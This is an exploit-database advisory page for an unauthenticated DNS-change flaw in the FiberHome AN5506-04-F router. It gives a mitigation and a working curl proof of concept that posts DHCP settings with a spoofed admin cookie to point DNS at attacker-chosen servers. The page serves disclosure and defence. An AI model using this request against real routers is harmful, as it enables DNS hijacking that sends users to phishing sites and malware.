header-logo
Suggest Exploit
vendor:
AN5506-04-F
by:
r0ots3c
7.5
CVSS
HIGH
Unauthenticated Remote DNS Change
287
CWE
Product Name: AN5506-04-F
Affected Version From: RP2617
Affected Version To: RP2617
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2018

FIBERHOME AN5506 Unauthenticated Remote DNS Change Vulnerability

Vulnerability exists in web interface of FIBERHOME AN5506-04-F router. This router has vulnerabilities where you can get information or edit configurations in an unauthenticated way. The biggest risk is the possibility of changing the dns of the device. Modifying systems' DNS settings allows cybercriminals to perform malicious activities like steering unknowing users to bad sites, replacing ads on legitimate sites, controlling and redirecting network traffic, and pushing additional malware.

Mitigation:

Authentication should be enabled for web interface of the router. Users should also be aware of the malicious activities that can be performed by changing the DNS settings.
Source

Exploit-DB raw data:

#  FIBERHOME AN5506 Unauthenticated Remote DNS Change Vulnerability
#
#  Software Version RP2617
#  Device Model AN5506-04-F
#  Vendor Homepage: www.fiberhome.com/
#
#
#  Date: 01/02/2018
#  Exploit Author: r0ots3c
#  http://wandoelmo.com.br
#  https://www.facebook.com/wsec.info
#
#  Description:
#  Vulnerability exists in web interface
#  This router has vulnerabilities where you can get information or edit
configurations in an unauthenticated way.
#  The biggest risk is the possibility of changing the dns of the device.
#
#  Modifying systems' DNS settings allows cybercriminals to
#  perform malicious activities like:
#
#    o  Steering unknowing users to bad sites:
#       These sites can be phishing pages that
#       spoof well-known sites in order to
#       trick users into handing out sensitive
#       information.
#
#    o  Replacing ads on legitimate sites:
#       Visiting certain sites can serve users
#       with infected systems a different set
#       of ads from those whose systems are
#       not infected.
#
#    o  Controlling and redirecting network traffic:
#       Users of infected systems may not be granted
#       access to download important OS and software
#       updates from vendors like Microsoft and from
#       their respective security vendors.
#
#    o  Pushing additional malware:
#       Infected systems are more prone to other
#       malware infections (e.g., FAKEAV infection).
#
#

Proof of Concept:

VIA CURL:
curl 'http://<TARGET>/goform/setDhcp'  -H 'Cookie: loginName=admin' -H
--data
'dhcpType=1&dhcprelay_ip=&dhcpStart=192.168.1.2&dhcpEnd=192.168.1.254&dhcpMask=255.255.255.0&dhcpPriDns=<MALICIOUS
DNS1>dhcpSecDns=<MALICIOUS
DNS2>&dhcpGateway=192.168.1.1&dhcptime=24&dhcptime_m=0&option_60enable_s=0&option_125enable_s=0&option125_text='
--compressed -k -i

Navigation

Suggest Exploit

Services By CQR